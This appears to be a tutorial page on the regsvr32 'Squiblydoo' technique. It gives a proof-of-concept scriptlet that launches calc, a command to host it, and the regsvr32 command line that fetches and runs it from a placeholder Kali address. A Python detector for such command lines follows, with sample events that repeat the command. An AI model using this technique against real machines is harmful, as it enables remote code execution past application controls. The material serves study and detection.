Regsvr32

ID: T1117 (deprecated; now sub-technique T1218.010, System Binary Proxy Execution: Regsvr32) Tactic: Defense Evasion, Execution

This technique (often called "Squiblydoo") abuses regsvr32.exe, a signed Microsoft binary, to fetch and run a scriptlet (.sct) file from a remote URL through scrobj.dll. Because regsvr32 is a trusted system binary that is normally allowed to run, it can proxy script execution past application whitelisting and other controls that only watch for script hosts such as wscript.exe or powershell.exe.

SCT: a Windows Script Component (scriptlet) file. It is an XML wrapper that registers a COM component whose logic is written in a scripting language such as VBScript or JScript; the embedded script is executed by the Windows Script Host engines that ship with Windows.

A very basic SCT file that will execute calc.exe (save it as file.sct, the name the PoC comment uses):

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <!--  License: BSD3-Clause -->
    <script language="JScript">
    <![CDATA[
        // x86 only (MSScriptControl is a 32-bit COM object), so on 64-bit Windows use the SysWOW64 copy:
        // C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll

        // Spin up a second script engine and hand it a one-liner that launches calc via WScript.Shell
        var scr = new ActiveXObject("MSScriptControl.ScriptControl");
        scr.Language = "JScript";
        scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
        // Eval runs the same statement again, so the PoC opens calc twice
        scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');

        // https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
        // Lots of hints here on further obfuscation
        ]]></script>
</registration>
</scriptlet>

I will host this on my Kali box using Python 3's built-in HTTP server, serving the directory that contains file.sct on port 80:

sudo python3 -m http.server 80

Now let's call it from our Victim Box. The form of the command is the one in the PoC's own comment, with the local file name replaced by the URL of the hosted scriptlet (<kali-ip> is a placeholder for the address of the box running the HTTP server):

regsvr32.exe /s /n /u /i:http://<kali-ip>/file.sct scrobj.dll

The switches matter: /s is silent, /n skips DllRegisterServer, /u combined with /i: makes regsvr32 call scrobj.dll's DllInstall with the /i: argument, and scrobj.dll (the scriptlet COM server) fetches and executes the .sct it is pointed at. Since the PoC's MSScriptControl object is 32-bit only, on 64-bit Windows run C:\Windows\SysWOW64\regsvr32.exe rather than the System32 copy, as the comment in the file notes.

And execute: calc.exe pops on the victim, and the Kali HTTP server logs the GET for file.sct.
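The flip side for a defender is spotting the command line above in process-creation telemetry. The script below is an added example, not code from the original page or from Casey Smith's PoC; it assumes events such as Sysmon Event ID 1 or Windows 4688 have already been normalized into (image path, command line) pairs, and the five sample events it scans are constructed for the demo (the IP and hostname in them are placeholders). It flags regsvr32 when scrobj.dll is on the command line and the /i: (or -i:) argument is a URL or a .sct file, handles the quoted and dash-prefixed switch variants that regsvr32 accepts, and ignores an ordinary DLL registration.

```python
"""Detect regsvr32 scriptlet (Squiblydoo-style) execution in process-creation events.

Added example; not part of the original page. Assumes events normalized into
(image, command_line) pairs. The SAMPLE_EVENTS below are constructed.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class Hit(NamedTuple):
    reason: str
    install_arg: Optional[str]  # whatever /i: pointed at, when present


# Image path ends in regsvr32 or regsvr32.exe (System32 or SysWOW64 copy).
REGSVR32 = re.compile(r"(?:^|[\\/])regsvr32(?:\.exe)?$", re.IGNORECASE)
# regsvr32 accepts both "/" and "-" switch prefixes; the /i: value may be quoted.
INSTALL_ARG = re.compile(r'[/-]i:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# scrobj.dll is the scriptlet COM server; a legitimate registration names the real DLL instead.
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def analyze(image: str, command_line: str) -> Optional[Hit]:
    """Return a Hit describing why this event looks like scriptlet abuse, or None."""
    if not REGSVR32.search(image):
        return None
    uses_scrobj = bool(SCROBJ.search(command_line))
    m = INSTALL_ARG.search(command_line)
    install_arg = (m.group(1) or m.group(2)) if m else None
    if uses_scrobj and install_arg:
        if REMOTE.match(install_arg):
            return Hit("regsvr32 loading remote scriptlet via scrobj.dll", install_arg)
        if install_arg.lower().endswith(".sct"):
            return Hit("regsvr32 loading local scriptlet via scrobj.dll", install_arg)
        return Hit("regsvr32 passing /i: argument to scrobj.dll", install_arg)
    if uses_scrobj:
        # scrobj.dll has no legitimate reason to be (un)registered interactively.
        return Hit("regsvr32 invoked on scrobj.dll without /i:", None)
    return None


# Constructed sample telemetry: (image, command_line)
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    # 1. remote scriptlet, the command line from this page (placeholder IP)
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s /n /u /i:http://10.0.0.5/file.sct scrobj.dll"),
    # 2. local scriptlet via the 32-bit copy, as in the PoC comment
    (r"C:\Windows\SysWOW64\regsvr32.exe",
     r"C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll"),
    # 3. dash switches, quoted URL with a space, full path to scrobj.dll
    (r"C:\Windows\System32\regsvr32.exe",
     r'REGSVR32.EXE -s -n -u -i:"https://example.test/a b.sct" C:\Windows\System32\scrobj.dll'),
    # 4. benign: a vendor installer registering its own COM DLL
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s C:\Program Files\Vendor\component.dll"),
    # 5. not regsvr32 at all, even though the string appears in the command line
    (r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c echo regsvr32 scrobj.dll"),
]


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, Hit]]:
    """Run analyze() over a batch and return (command_line, Hit) for every match."""
    hits = []
    for image, cmd in events:
        hit = analyze(image, cmd)
        if hit is not None:
            hits.append((cmd, hit))
    return hits


if __name__ == "__main__":
    for cmd, hit in scan(SAMPLE_EVENTS):
        print(f"[{hit.reason}] {cmd}")
```

Tuning note: the rule keys on scrobj.dll rather than on the /i: switch alone, because /i: with a real DLL is how vendors pass install arguments to their own DllInstall; matching on the scriptlet COM server keeps false positives low while still catching the quoted, dash-prefixed and SysWOW64 variants.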
